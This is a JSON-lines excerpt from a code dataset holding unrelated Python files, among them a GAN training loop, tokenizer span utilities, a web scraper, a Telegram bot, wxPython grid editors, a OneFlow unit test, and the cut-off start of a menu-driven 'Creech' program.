{"seq_id":"418713365","text":"from dataset import *\nfrom model import *\nfrom loss import *\nimport cv2\n\ntrain_dataset = tf.data.Dataset.list_files(PATH + 'train/*.jpg', shuffle=cfg.BUFFER_SIZE)\ntrain_dataset = train_dataset.map(lambda x:load_image(x, True))\ntrain_dataset = train_dataset.batch(1)\n\ntest_dataset = tf.data.Dataset.list_files(PATH + 'test/*.jpg')\ntest_dataset = test_dataset.map(lambda x:load_image(x, False))\ntest_dataset = test_dataset.batch(1)\n\ngenerator = Generator()\ndiscriminator = Discriminator()\n\ngenerator_optimizer = tf.train.AdamOptimizer(2e-4, beta1=0.5)\ndiscriminator_optimizer = tf.train.AdamOptimizer(2e-4, beta1=0.5)\n\ncheckpoint_dir = './training_checkpoints'\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\ncheckpoint = tf.train.Checkpoint(generator_optimizer=generator_optimizer, discriminator_optimizer=discriminator_optimizer)\n\nEPOCHS = cfg.EPOCHS\n\ndef save_images(model, test_input, tar, epoch):\n\tprediction = model(test_input, training=True)\n\ttest_input, target, predicted_output = test_input[0], tar[0], prediction[0]\n\timg = np.hstack([test_input, target, predicted_output])\n\n\tif not os.path.exists('samples/'):\n\t\tos.makedirs('samples/')\n\n\tcv2.imwrite(\"samples/epoch-{}.jpg\".format(epoch), img)\n\n\ndef train(dataset, epochs):\n\n\tfor epoch in range(epochs):\n\t\tstart = time.time()\n\n\t\tfor input_image, target in dataset:\n\t\t\twith tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n\t\t\t\tgen_output = generator(input_image, training=True)\n\t\t\t\tdisc_real_output = discriminator(input_image, target, training=True)\n\t\t\t\tdisc_generated_output = discriminator(input_image, gen_output, training=True)\n\n\t\t\t\tgen_loss = generator_loss(disc_generated_output, gen_output, target)\n\t\t\t\tdisc_loss = discriminator_loss(disc_real_output, disc_generated_output)\n\n\t\t\t\tgenerator_gradients = gen_tape.gradient(gen_loss, generator.variables)\n\t\t\t\tdiscrimiator_gradients = disc_tape.gradient(disc_loss, discriminator.variables)\n\n\t\t\t\tgenerator_optimizer.apply_gradients(zip(generator_gradients, 
generator.variables))\n\t\t\t\tdiscriminator_optimizer.apply_gradients(zip(discrimiator_gradients, discriminator.variables))\n\n\t\tif(epoch%1 == 0):\n\t\t\tfor inp, tar in test_dataset.take(1):\n\t\t\t\tsave_images(generator, inp, tar, epoch)\n\n\t\tif( (epoch + 1)%20 == 0):\n\t\t\tcheckpoint.save(file_prefix=checkpoint_prefix)\n\n\t\tprint(\"Time taken for epoch {} is {} seconds\".format((epoch + 1), (time.time() - start)))\n\ntrain(train_dataset, EPOCHS)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"436942535","text":"import heapq\n\n\nanswer = 0\nscoville = [1,2,3,9,10,12]\nK = 7\nkey = 0\nheapq.heapify(scoville)\nwhile len(scoville)>=1:\n check1 = heapq.heappop(scoville)\n if check1 >= K:\n #all remaining values already meet the threshold\n key = 1\n break\n if len(scoville)>=1:\n check2 = heapq.heappop(scoville)\n scocheck = check1 + check2 * 2\n heapq.heappush(scoville, scocheck)\n answer += 1\n\n\nif not key:\n answer = -1\n\nprint(answer)\n","sub_path":"hot.py","file_name":"hot.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"279812314","text":"from IPython.core.display import display, HTML\nfrom http.client import InvalidURL\nimport matplotlib\nimport matplotlib.cm\nimport unicodedata\n\nfrom collections import defaultdict\n\n\nPUNCT = '.,?!();:'\n\n\ndef display_spans(spans, text):\n # todo: use style=\"background-color: #Oxffffff\"\n result = []\n spans = set(spans)\n toxic, prev_toxic = False, False\n for i, c in enumerate(text):\n if i in spans:\n toxic = True\n if not prev_toxic:\n result.append('')\n else:\n toxic = False\n if prev_toxic:\n result.append('')\n result.append(c)\n prev_toxic = toxic\n try:\n display(HTML(''.join(result)))\n except InvalidURL:\n print(''.join(result))\n\n \ndef display_token_scores(tokens, scores, b=None, cmap=None, bert=False):\n if cmap is None:\n cmap = matplotlib.cm.get_cmap('bwr')\n if b is None:\n b = [0] * len(tokens)\n\n spans = []\n for token, score, boldness in zip(tokens, scores, b):\n text = token.replace(\"Ġ\", \" \")\n if bert:\n if text.startswith('##'):\n text = text[2:]\n elif text not in PUNCT or text == '(':\n text = ' ' + text\n if boldness:\n text = '<b>{}</b>'.format(text)\n spans.append(\n '<span style=\"color: {}\">{}</span>'.format(\n \"#{0:02x}{1:02x}{2:02x}\".format(*cmap(score, bytes=True)[:3]),\n text\n )\n )\n display(HTML(''.join(spans)))\n\n \ndef spans2labels(text, spans, tokenizer, bos=True, left_space=False):\n token_ids = tokenizer.encode(text)\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n char2tok = [0] * len(text)\n left = 0\n first = 1 if bos else 0\n for i, tok in enumerate(tokens[first:-1]):\n right = left + len(tok)\n if i == 0 and left_space:\n right -= 1\n char2tok[left:right] = [i+bos] * (right - left)\n left = right\n labels = [0] * len(tokens)\n for toxic_char in spans:\n labels[char2tok[toxic_char]] = 1\n return labels\n\n\ndef labels2spans(text, labels, tokenizer, space = 'Ġ', bos=True, left_space=False):\n result = []\n token_ids = tokenizer.encode(text)\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n left = 0\n prev_label = 0\n first = 1 if bos else 0\n for i, (tok, label) in enumerate(zip(tokens[first:-1], labels[first:-1])):\n right = left + len(tok)\n if i == 0 and left_space:\n right -= 1\n if label:\n if tok[0] == space and not prev_label:\n left += 1\n result.extend(range(left, right))\n left = right\n 
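        # (added note / assumption) 'Ġ' is the leading-space marker used by GPT-2-style\n        # BPE tokenizers; the left += 1 above skips that space character so the returned\n        # character offsets stay aligned with the raw text (e.g. ' cat' -> span over 'cat').\n        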
prev_label = label\n return result\n\n\ndef decode_spans(text, target_proba, threshold, tokenizer, agg=max, space='Ġ', punct=PUNCT, return_spans=True, truncate=True):\n # try to label a whole multitoken word consistently\n punct = set(punct)\n result = []\n token_labels = [0]\n token_ids = tokenizer.encode(text)\n if truncate:\n token_ids = token_ids[:tokenizer.model_max_length]\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n assert len(tokens) <= len(target_proba), '{} > {}'.format(len(tokens), len(target_proba))\n left = 0\n prev_label = 0\n word_start = 0\n word_scores = []\n for i, (tok, tp) in enumerate(zip(tokens[1:], target_proba[1:])):\n right = left + len(tok)\n # start of word (except the first one)\n if i > 0 and (tok[0] == space or tok == '' or tok in punct):\n word_score = agg(word_scores)\n if word_score > threshold:\n if not prev_label and i > 0:\n word_start += 1\n prev_label = 1\n result.extend(range(word_start, left))\n token_labels.extend([1] * len(word_scores))\n else:\n prev_label = 0\n token_labels.extend([0] * len(word_scores))\n word_scores = []\n word_start = left\n word_scores.append(tp)\n left = right\n token_labels.extend([0] * len(word_scores))\n if return_spans:\n return result\n else:\n return token_labels\n\n\ndef bertlike_normalize(text):\n \"\"\"Strips accents from a piece of text.\"\"\"\n text = unicodedata.normalize(\"NFD\", text.lower())\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == \"Mn\":\n continue\n output.append(char)\n return \"\".join(output)\n\n\ndef bert_char2tok(text, tokens, bos=1):\n # find approximate positions of each sentencepiece token in a text\n # spaces are all mapped to zero token\n char2tok = [0] * len(text)\n tnorm = bertlike_normalize(text)\n\n left = 0\n first = int(bos)\n for i, tok in enumerate(tokens[first:-1]):\n t2 = tok.lstrip('##')\n position = tnorm.find(t2, left)\n if position == -1:\n print(t2, 'not found in', tnorm[left:])\n continue\n left = position\n right = left + len(t2)\n if i == 0:\n right -= 1\n char2tok[left:right] = [i+bos] * (right - left)\n left = right\n return char2tok\n\ndef bert_spans2labels(text, spans, tokenizer):\n tokens = tokenizer.convert_ids_to_tokens(tokenizer.encode(text))\n labels = [0] * len(tokens)\n char2tok = bert_char2tok(text, tokens)\n for ch in spans:\n if ch >= len(char2tok):\n # this behavior may happen with weird tokens (e.g. 
accents), let's just ignore it\n break\n t = char2tok[ch]\n if t > 0:\n labels[t] = 1\n return labels\n\n\ndef bert_labels2spans(text, labels, tokenizer):\n result = []\n token_ids = tokenizer.encode(text)\n tokens = tokenizer.convert_ids_to_tokens(token_ids)\n c2t = bert_char2tok(text, tokens)\n t2c = defaultdict(list)\n for i, t in enumerate(c2t):\n if t > 0: t2c[t].append(i)\n \n left = 0\n prev_label = 0\n first = 1\n for i, (tok, label) in enumerate(zip(tokens[first:-1], labels[first:-1])):\n token_range = t2c[i+first]\n if not token_range:\n continue\n left, right = min(token_range), max(token_range)\n # print(i, tok, \"'\" + text[left:right] + \"'\")\n if label:\n result.extend(range(left - prev_label, right + 1))\n prev_label = label\n return result\n","sub_path":"semeval2021/spans_utils.py","file_name":"spans_utils.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"355028645","text":"import bs4 as bs\nimport urllib.request\n\n\n# getting the source code\nsauce = urllib.request.urlopen('https://www.booking.com/').read()\n\n\n# turn the source code into bsoup object\nsoup = bs.BeautifulSoup(sauce, 'lxml')\n\n\n# Booking´s promotions\ndef get_promotions():\n for div in soup.find_all('div', class_='promotion-postcards-list'):\n a = div.find_all('a')\n print(a)\n\n\nget_promotions()\n\n\n\n\n# Booking's accommodations on the home page\ndef get_accommodations():\n for div in soup.find_all('div', class_='d-bh-promotion--overflow '):\n a = div.find_all('a')\n print(a)\n\n\n#get_accommodations()\n\n# popular destinations\ndef get_popular_destinations():\n for ul in soup.find_all('ul', class_='b-popular_list lp_endorsements_popular_destinations_container'):\n li = ul.find_all('a')\n print(li)\n\n\n\n# get_popular_destinations()\n\n\n# Discover with booking\ndef discover_destinations():\n for p in soup.find_all('div', class_='dcbi-country__container'):\n a = p.find_all('p')\n print(a)\n\n\n# discover_destinations()\n\n","sub_path":"scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"361944243","text":"import os\nimport logging\nfrom sanic import Sanic\nfrom sanic.response import HTTPResponse\nimport sanic_sockjs\n\nCHAT_FILE = open(\n os.path.join(os.path.dirname(__file__), 'chat.html'), 'rb').read()\n\n\nasync def chat_msg_handler(msg, session):\n if msg.type == sanic_sockjs.MSG_OPEN:\n session.manager.broadcast(\"Someone joined.\")\n elif msg.type == sanic_sockjs.MSG_MESSAGE:\n session.manager.broadcast(msg.data)\n elif msg.type == sanic_sockjs.MSG_CLOSED:\n session.manager.broadcast(\"Someone left.\")\n\napp = Sanic(__name__)\n\n@app.get('/')\nasync def index(request):\n return HTTPResponse(None, body_bytes=CHAT_FILE, content_type=\"text/html\")\n\n\nif __name__ == '__main__':\n \"\"\"Simple sockjs chat.\"\"\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s')\n\n sanic_sockjs.add_endpoint(app, chat_msg_handler, name='chat', prefix='/sockjs/')\n\n app.run(\"127.0.0.1\", 8002)\n","sub_path":"examples/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"159162480","text":"#! 
python3\n# bulletPointAdder.py - add bullet points to lines\n\nimport pyperclip\n\ntext = pyperclip.paste()\n\n# separate lines\nlines = text.split('\\n')\n\n# add *(star) to each line\nfor i in range(len(lines)):\n\tlines[i] = '* ' + lines[i]\n\n# join lines\ntext = '\\n'.join(lines)\n\npyperclip.copy(text)\n","sub_path":"bulletPointAdder.py","file_name":"bulletPointAdder.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"370077249","text":"# -*- coding: gb2312 -*-\nfrom docx import Document\n# from docx.shared import Pt\n# from docx.oxml.ns import qn\n# from docx.shared import Inches\nimport os\n\n## target directory\nbasep = '.\\\\'\ndirs = []\nfiles = []\n## targetPath may be set explicitly; if left empty, the docx is generated next to each source file\ntargetPath = '.\\\\result'\n# targetPath=''\n\nif targetPath is None:\n targetPath = ''\n\nif not os.path.exists(targetPath) and targetPath != '':\n os.mkdir(targetPath)\n\n# read each text file and generate a docx\ndef handleFile(fplist):\n for fp in fplist:\n if os.path.exists(fp) and os.path.splitext(fp)[-1] == '.txt':\n lines = []\n f = open(fp)\n lines = f.readlines()\n f.close()\n document = Document()\n for line in lines:\n paragraph = document.add_paragraph(line)\n\n savepath = ''\n if targetPath != '':\n name = os.path.splitext(os.path.basename(fp))[0]\n savepath = os.path.join(targetPath, name+'.docx')\n document.save(savepath)\n\n else:\n name = os.path.splitext(fp)[0]\n savepath = name+'.docx'\n document.save(savepath)\n if savepath != '':\n print('file saved:', savepath)\n\n# walk the directory tree\ndef detectPath(path):\n for root, dirs, files in os.walk(path):\n print(root,dirs,files)\n fplist = [os.path.join(root, f) for f in files]\n handleFile(fplist)\n\n\n# run the conversion\ndetectPath(basep)\n","sub_path":"background/05-docx/handle.py","file_name":"handle.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"445537851","text":"import time\nimport json\nimport requests\nimport urllib.parse\nimport numpy as np\nimport random\nfrom sys import stdout\nfrom keras.models import load_model\nimport utils\n\n\nTOKEN = open('../data/data_bot').read().strip(' \\n')\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return (text, chat_id)\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n get_url(url)\n\ndef send_message_reply(text, chat_id, msg_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}&reply_to_message_id={}\".format(text, chat_id, msg_id)\n get_url(url)\n\ndef set_action(chat_id, action):\n url = URL + 
\"sendChatAction?chat_id={}&action={}\".format(chat_id, action)\n get_url(url)\n\n\ndef handle_updates(updates, predictor, voc):\n first = True\n for update in updates[\"result\"]:\n try:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n msg = update[\"message\"][\"message_id\"]\n if 'first_name' in update[\"message\"][\"from\"]:\n to = update[\"message\"][\"from\"][\"first_name\"]\n else:\n to = ''\n if 'username' in update[\"message\"][\"from\"]:\n user = update[\"message\"][\"from\"][\"username\"]\n else:\n user = ''\n s = ''\n\n in_msgs = text.split()\n\n if 'yolanda' in in_msgs or \\\n 'yolianda' in in_msgs or \\\n '@yolianda' in in_msgs or \\\n '@yoliandabot' in in_msgs or \\\n 'predicción' in in_msgs or \\\n 'destino' in in_msgs:\n\n div_cmd = '/diversidad'\n div_par = 'diversity'\n mult_cmd = '/multiplicador'\n mult_par = 'multiplier'\n\n params = {}\n\n if div_cmd in in_msgs:\n params[div_par] = float(in_msgs[in_msgs.index(div_cmd)+1])\n params['new_'+div_par] = True\n\n if mult_cmd in in_msgs:\n params[mult_par] = float(in_msgs[in_msgs.index(mult_cmd)+1])\n params['new_'+mult_par] = True\n\n\n #print('debería responder')\n if first:\n first = False\n set_action(chat, 'typing')\n s = predictor.generate_text(**params)\n message = ''\n if params != {}:\n print(str(params))\n\n if random.randint(0,100) < 30:\n message += to + ': '\n message += utils.token_sequence_to_text([voc[i] for i in s])\n send_message(message, chat)\n else:\n message += utils.token_sequence_to_text([voc[i] for i in s])\n send_message_reply(message, chat, msg)\n \n with open('../log/yolianda_log','a') as outfile:\n outfile.write(\"{} {} {} {}\\n\".format(chat, msg, user, message))\n print(chat, msg, user, message)\n else:\n #print('no debería responder')\n pass\n except Exception as e:\n with open('../log/yolianda_log','a') as outfile:\n outfile.write(\"{}\\n{}\\n\".format(update, e))\n print(update)\n print(e)\n pass\n \n\ndef main():\n print(TOKEN)\n print(URL)\n\n voc_file = '../data/horoscopo_5000_0300_voc.txt'\n voc = open(voc_file).read().split()\n voc_ind = dict((s,i) for i,s in enumerate(voc))\n\n model_file = '../models/lstm_model_170821.0948.h5'\n model = load_model(model_file)\n predictor = utils.PredictorParByParReal(model,voc,voc_ind,voc_ind[''])\n\n print(\"listoco!\")\n\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n handle_updates(updates, predictor, voc)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()","sub_path":"text_generator/src/predictobot.py","file_name":"predictobot.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} {"seq_id":"166372814","text":"\"\"\" This module defines several custom cell editors \"\"\"\n\nimport wx\nimport wx.adv\nfrom wx.grid import PyGridCellRenderer, PyGridCellEditor\n\nfrom hm.wxx.helper import wrapTextLines\nfrom hm.wxx.form.converter import date2wxdatetime\n\n\nclass GridCellAutoWrapStringRenderer(PyGridCellRenderer):\n \"\"\" Overwrites the default GridCellAutoWrapStringRenderer by honoring the\n Chinese text breaking rules \"\"\"\n def Draw(self, grid, attr, dc, rect, row, col, isSelected):\n dc.SetBackgroundMode(wx.SOLID)\n\n if grid.IsEnabled():\n if isSelected:\n if wx.Window.FindFocus() == grid.GetGridWindow():\n clr = grid.GetSelectionBackground()\n else:\n clr = 
wx.SystemSettings_GetColour(wx.SYS_COLOUR_BTNSHADOW)\n dc.SetBrush(wx.Brush(clr, wx.SOLID))\n dc.SetTextBackground(clr)\n dc.SetTextForeground(grid.GetSelectionForeground())\n else:\n dc.SetBrush(wx.Brush(attr.GetBackgroundColour(), wx.SOLID))\n dc.SetTextBackground(attr.GetBackgroundColour())\n dc.SetTextForeground(attr.GetTextColour())\n else:\n dc.SetBrush(wx.Brush(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE), wx.SOLID))\n dc.SetTextBackground(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE))\n dc.SetTextForeground(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_GRAYTEXT))\n\n # draw the background\n dc.SetPen(wx.TRANSPARENT_PEN)\n dc.DrawRectangleRect(rect)\n\n # draw the text\n dc.SetBackgroundMode(wx.TRANSPARENT)\n dc.SetFont(attr.GetFont())\n horizAlign, vertAlign = attr.GetAlignment()\n grid.DrawTextRectangle(\n dc, self.GetTextLines(grid, attr, dc, rect, row, col),\n rect, horizAlign, vertAlign)\n\n def GetTextLines(self, grid, attr, dc, rect, row, col):\n \"\"\" Is is called by GetBestSize and Draw method to split the text into\n multiple lines by inserting \\n in the appropriate places into the\n original cell string value. It will break a line at any position\n instead of word break so it is best used for breaking Chinese texts.\n\n Note the font for drawing and calculating best size is set here. \"\"\"\n text = grid.GetCellValue(row, col)\n if len(text) == 0:\n return ''\n\n font = attr.GetFont()\n if not font.IsOk():\n font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)\n dc.SetFont(font)\n\n autoWrap = grid.GetColumn(col).autoWrap\n return wrapTextLines(dc, rect.GetWidth(), text) if autoWrap else text\n\n def GetBestSize(self, grid, attr, dc, row, col):\n rect = wx.Rect(0, 0, grid.GetColSize(col) - 2, 14)\n text = self.GetTextLines(grid, attr, dc, rect, row, col)\n x, y, h = dc.GetMultiLineTextExtent(text)\n return (x, y)\n\n def Clone(self):\n return GridCellAutoWrapStringRenderer()\n\n\nclass GridCellAutoWrapStringEditor(PyGridCellEditor):\n def Create(self, parent, id, evtHandler):\n \"\"\" Called to create the control, which must derive from wx.Control.\n \"\"\"\n self._c = wx.TextCtrl(parent, id, style=wx.TE_MULTILINE)\n self.SetControl(self._c)\n\n # this one is important other wise EndEdit won't be invoked when mouse\n # is clicked out side of the grid\n if evtHandler:\n self._c.PushEventHandler(evtHandler)\n\n def SetSize(self, rect):\n \"\"\" Position/size the edit control within the cell rectangle.\n If you don't fill the cell (the rect) then be sure to override\n PaintBackground and do something meaningful there. \"\"\"\n self._c.SetDimensions(rect.x, rect.y, rect.width, rect.height)\n\n def BeginEdit(self, row, col, grid):\n \"\"\" Fetch the value from the table and prepare the edit control to begin\n editing. Set the focus to the edit control. \"\"\"\n self.startValue = grid.GetValueRaw(row, col)\n if self.startValue:\n self._c.SetOwnBackgroundColour(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW))\n self._c.SetValue(self.startValue)\n self._c.SetFocus()\n self._c.SetInsertionPoint(0)\n\n def EndEdit(self, row, col, grid, oldVal):\n \"\"\" Complete the editing of the current cell. Returns True if the value\n has changed. If necessary, the control may be destroyed. 
\"\"\"\n changed = False\n\n val = self._c.GetValue()\n if val != self.startValue:\n changed = True\n grid.GetTable().SetValue(row, col, val) # update the table\n\n self.startValue = None\n # After we finish, the control should be cleared so that value from\n # previous editing will not be carried over to new empty cell\n self._c.Clear()\n return changed\n\n def Reset(self):\n \"\"\" Reset the value in the control back to its starting value. \"\"\"\n self._c.SetValue(self.startValue)\n\n def IsAcceptedKey(self, evt):\n \"\"\" Return True to allow the given key to start editing: the base class\n version only checks that the event has no modifiers. F2 is special\n and will always start the editor. \"\"\"\n return (not (evt.ControlDown() or evt.AltDown()) and\n evt.GetKeyCode() != wx.WXK_SHIFT)\n\n def Destroy(self):\n \"\"\" final cleanup \"\"\"\n self.base_Destroy()\n\n def Clone(self):\n \"\"\" Create a new object which is the copy of this one \"\"\"\n return GridCellAutoWrapStringEditor()\n\n\nclass GridCellDateEditor(PyGridCellEditor):\n \"\"\" This wraps DatePickerCtrl with a dropdown control as a grid custom\n editor \"\"\"\n def __init__(self, allowNone=False):\n self.allowNone = allowNone\n super(GridCellDateEditor, self).__init__()\n\n def Create(self, parent, id, evtHandler):\n \"\"\" Called to create the control, which must derive from wx.Control.\n \"\"\"\n style = wx.DP_DROPDOWN\n if self.allowNone:\n style = style | wx.DP_ALLOWNONE\n self._c = wx.adv.DatePickerCtrl(\n parent, id, size=(110, -1), style=style)\n self.SetControl(self._c)\n\n if evtHandler:\n self._c.PushEventHandler(evtHandler)\n\n def Show(self, show, attr):\n \"\"\" Show or hide the edit control. You can use the attr (if not None)\n to set colours or fonts for the control. \"\"\"\n super(GridCellDateEditor, self).Show(show)\n\n def SetSize(self, rect):\n \"\"\" Position/size the edit control within the cell rectangle.\n If you don't fill the cell (the rect) then be sure to override\n PaintBackground and do something meaningful there. \"\"\"\n w, h = self._c.GetSizeTuple()\n w, h = max(w, rect.width + 2), max(h, rect.height + 2)\n self._c.SetDimensions(rect.x, rect.y, w, h, wx.SIZE_ALLOW_MINUS_ONE)\n\n def BeginEdit(self, row, col, grid):\n \"\"\" Fetch the value from the table and prepare the edit control\n to begin editing. Set the focus to the edit control. \"\"\"\n self.startValue = grid.GetValueRaw(row, col)\n if self.startValue:\n self.startValue = date2wxdatetime(self.startValue)\n self._c.SetValue(self.startValue)\n self._c.SetFocus()\n\n def EndEdit(self, row, col, grid, oldVal):\n \"\"\" Complete the editing of the current cell. Returns True if the value\n has changed. If necessary, the control may be destroyed. \"\"\"\n changed = False\n\n val = self._c.GetValue()\n if val != self.startValue:\n changed = True\n grid.GetTable().SetValue(row, col, val) # update the table\n\n self.startValue = None\n return changed\n\n def Reset(self):\n \"\"\" Reset the value in the control back to its starting value. \"\"\"\n self._c.SetValue(self.startValue)\n\n def IsAcceptedKey(self, evt):\n \"\"\" Return True to allow the given key to start editing: the base class\n version only checks that the event has no modifiers. F2 is special\n and will always start the editor. 
\"\"\"\n return (not (evt.ControlDown() or evt.AltDown()) and\n evt.GetKeyCode() != wx.WXK_SHIFT)\n\n def Destroy(self):\n \"\"\" final cleanup \"\"\"\n self.base_Destroy()\n\n def Clone(self):\n \"\"\" Create a new object which is the copy of this one \"\"\"\n return GridCellDateEditor()\n","sub_path":"hm/wxx/grid/celleditors.py","file_name":"celleditors.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"427514186","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom collections import OrderedDict\nimport numpy as np\nimport oneflow as flow\nfrom test_util import (\n GenArgDict,\n test_global_storage,\n type_name_to_flow_type,\n type_name_to_np_type,\n)\nimport oneflow.typing as oft\n\n\ndef _test_tril_fw_bw(test_case, device, shape, type_name, diagonal=0):\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float)\n\n if type_name == \"float16\":\n flow_type = flow.float\n np_type = np.float32\n else:\n flow_type = type_name_to_flow_type[type_name]\n np_type = type_name_to_np_type[type_name]\n\n @flow.global_function(type=\"train\", function_config=func_config)\n def test_tril_fw_bw_job(x: oft.Numpy.Placeholder(shape, dtype=flow_type),):\n with flow.scope.placement(device, \"0:0\"):\n x_var = flow.get_variable(\n name=\"xv\",\n shape=(1,),\n dtype=flow.float,\n initializer=flow.zeros_initializer(),\n )\n x += flow.cast(x_var, dtype=flow_type)\n if type_name == \"float16\":\n out = flow.cast(\n flow.math.tril(flow.cast(x, flow.float16), diagonal), flow.float\n )\n else:\n out = flow.math.tril(x, diagonal)\n flow.optimizer.SGD(\n flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0\n ).minimize(out)\n\n flow.watch(x, test_global_storage.Setter(\"x\"))\n flow.watch_diff(x, test_global_storage.Setter(\"x_diff\"))\n flow.watch(out, test_global_storage.Setter(\"out\"))\n flow.watch_diff(out, test_global_storage.Setter(\"out_diff\"))\n return out\n\n check_point = flow.train.CheckPoint()\n check_point.init()\n x = np.random.randint(low=0, high=100, size=shape)\n test_tril_fw_bw_job(x.astype(np_type)).get()\n\n np_out = np.tril(test_global_storage.Get(\"x\"), diagonal)\n np_x_diff = np.tril(test_global_storage.Get(\"out_diff\"), diagonal)\n\n if type_name == \"float16\":\n tolerance = 1e-3\n else:\n tolerance = 1e-5\n test_case.assertTrue(\n np.allclose(\n np_out, test_global_storage.Get(\"out\"), rtol=tolerance, atol=tolerance\n )\n )\n test_case.assertTrue(\n np.allclose(\n np_x_diff, test_global_storage.Get(\"x_diff\"), rtol=tolerance, atol=tolerance\n )\n )\n\n\ndef test_tril_fw_bw(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"device\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"type_name\"] = [\"float32\", \"float16\", \"double\", \"int8\", \"int32\", \"int64\"]\n arg_dict[\"shape\"] = [(6, 6), (3, 6, 8), (3, 4, 8, 6)]\n arg_dict[\"diagonal\"] = [-8, -1, 0, 1, 8]\n\n 
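    # (added note / assumption) GenArgDict is taken to yield one kwargs dict per element\n    # of the cartesian product of the option lists above, e.g. {\"device\": \"gpu\",\n    # \"type_name\": \"float16\", \"shape\": (6, 6), \"diagonal\": 0}; the unsupported\n    # cpu/float16 combination is filtered out just below.\n    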
for arg in GenArgDict(arg_dict):\n if arg[\"device\"] == \"cpu\" and arg[\"type_name\"] == \"float16\":\n continue\n _test_tril_fw_bw(test_case, **arg)\n","sub_path":"oneflow/python/test/ops/test_tril.py","file_name":"test_tril.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"229626317","text":"import json\nimport os\nimport re\nimport stat\nimport sys\n\nfrom api import encode_parameters, decode_parameters\nfrom utils import clear_screen, read_prompt, hit_enter, hashify, base32, read_secret\n\n\nCREECH_LOGO = \"\"\"\n ____ _ \n / ___|_ __ ___ ___ ___| |__ \n | | | '__/ _ \\/ _ \\/ __| '_ \\ \n | |___| | | __/ __/ (__| | | |\n \\____|_| \\___|\\___|\\___|_| |_|\n\n U.S. Air Force Base, Nevada, USA.\n \n\"\"\"[1:]\n\nMAIN_SCREEN = \"\"\"\nWelcome soldier!\n\n1. Get permission for drone operation\n2. Leave Creech\n\"\"\".lstrip()\n\nPERMISSION_SCREEN = \"\"\"\nChoose drone operation (trace, kill, peace):\n\"\"\".lstrip()\n\n\nNAME_RE = re.compile('^[a-zA-Z]+ [a-zA-Z]+$')\n\n\nclass Creech:\n def __init__(self, base_dir):\n self.base_dir = base_dir\n self.secret_key = read_secret(os.path.join(base_dir, 'rw', 'config', 'creech.ini'))\n\n def run(self):\n while True:\n clear_screen()\n if not self._main_screen():\n break\n\n\n def _main_screen(self):\n \"\"\"Main screen. This is what you get when you visit Creech. \"\"\"\n 